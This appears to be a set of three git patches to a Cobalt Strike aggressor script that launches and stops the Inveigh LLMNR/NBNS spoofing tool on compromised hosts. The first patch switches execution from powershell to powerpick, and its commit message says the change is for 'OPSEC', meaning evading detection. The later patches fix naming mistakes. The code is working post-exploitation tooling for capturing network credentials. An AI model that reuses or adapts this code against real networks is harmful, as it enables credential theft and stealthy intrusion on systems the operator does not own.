From 66353a3d6ec6975fa918c82d52163a2e8f76d377 Mon Sep 17 00:00:00 2001 From: "Ubuntu 17.10" Date: Thu, 14 Feb 2019 12:26:11 -0500 Subject: [PATCH 1/3] Changed Inveigh to use powerpick for OPSEC --- inveigh/inveigh.cna | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/inveigh/inveigh.cna b/inveigh/inveigh.cna index 89b8de1..e8c5785 100644 --- a/inveigh/inveigh.cna +++ b/inveigh/inveigh.cna @@ -8,35 +8,35 @@ sub runPrivilegedInveigh { $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1")); - bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); + bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); prompt_text("How long would you like to run Inveigh (in minutes)?", "15", { - binput($bid, "powershell Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); - bpowershell($bid, "Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); + binput($bid, "powerpick Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); + bpowerpick($bid, "Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); }); } sub runUnPrivilegedInveigh { $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); - bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); + bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); prompt_text("How long would you like to run Inveigh (in minutes)?", "15", { - binput($bid, "powershell Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); - bpowershell($bid, "Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); + binput($bid, "powerpick Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); + bpowerpick($bid, "Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); }); } sub stopInveigh{ $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1")); - bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); - bpowershell($bid, "Stop-Inveigh"); + bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); + bpowerpick($bid, "Stop-Inveigh"); } sub stopInveigh-Unprivileged{ $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); - bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); - bpowershell($bid, "Stop-Inveigh"); + bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); + bpowerpick($bid, "Stop-Inveigh"); } popup beacon_bottom { From b8544ce9edd4f772281a1df6c5f1d335c2326832 Mon Sep 17 00:00:00 2001 From: "Ubuntu 17.10" Date: Thu, 14 Feb 2019 12:28:40 -0500 Subject: [PATCH 2/3] Fixed renaming error --- inveigh/inveigh.cna | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/inveigh/inveigh.cna b/inveigh/inveigh.cna index e8c5785..2d4c536 100644 --- a/inveigh/inveigh.cna +++ b/inveigh/inveigh.cna @@ -8,7 +8,7 @@ sub runPrivilegedInveigh { $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1")); - bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); + powershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); prompt_text("How long would you like to run Inveigh (in minutes)?", "15", { binput($bid, "powerpick Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); bpowerpick($bid, "Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); @@ -18,7 +18,7 @@ sub runPrivilegedInveigh { sub runUnPrivilegedInveigh { $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); - bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); + powershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); prompt_text("How long would you like to run Inveigh (in minutes)?", "15", { binput($bid, "powerpick Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); bpowerpick($bid, "Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); @@ -28,14 +28,14 @@ sub runUnPrivilegedInveigh { sub stopInveigh{ $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1")); - bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); + powershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); bpowerpick($bid, "Stop-Inveigh"); } sub stopInveigh-Unprivileged{ $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); - bpowerpick_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); + powershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); bpowerpick($bid, "Stop-Inveigh"); } From 7cedfe61ab17e6ecb93429375d1cdfe781b10d10 Mon Sep 17 00:00:00 2001 From: "Ubuntu 17.10" Date: Thu, 14 Feb 2019 12:29:35 -0500 Subject: [PATCH 3/3] Fixed other renaming error --- inveigh/inveigh.cna | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/inveigh/inveigh.cna b/inveigh/inveigh.cna index 2d4c536..610242e 100644 --- a/inveigh/inveigh.cna +++ b/inveigh/inveigh.cna @@ -8,7 +8,7 @@ sub runPrivilegedInveigh { $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1")); - powershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); + bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); prompt_text("How long would you like to run Inveigh (in minutes)?", "15", { binput($bid, "powerpick Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); bpowerpick($bid, "Invoke-Inveigh -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); @@ -18,7 +18,7 @@ sub runPrivilegedInveigh { sub runUnPrivilegedInveigh { $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); - powershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); + bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); prompt_text("How long would you like to run Inveigh (in minutes)?", "15", { binput($bid, "powerpick Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); bpowerpick($bid, "Invoke-InveighUnprivileged -ConsoleOutput N -RunTime $1 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y"); @@ -28,14 +28,14 @@ sub runUnPrivilegedInveigh { sub stopInveigh{ $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh.ps1")); - powershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); + bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh.ps1")); bpowerpick($bid, "Stop-Inveigh"); } sub stopInveigh-Unprivileged{ $bid = $1; binput($1, "powershell-import " . script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); - powershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); + bpowershell_import($1, script_resource("inveigh/Scripts/Inveigh-Unprivileged.ps1")); bpowerpick($bid, "Stop-Inveigh"); }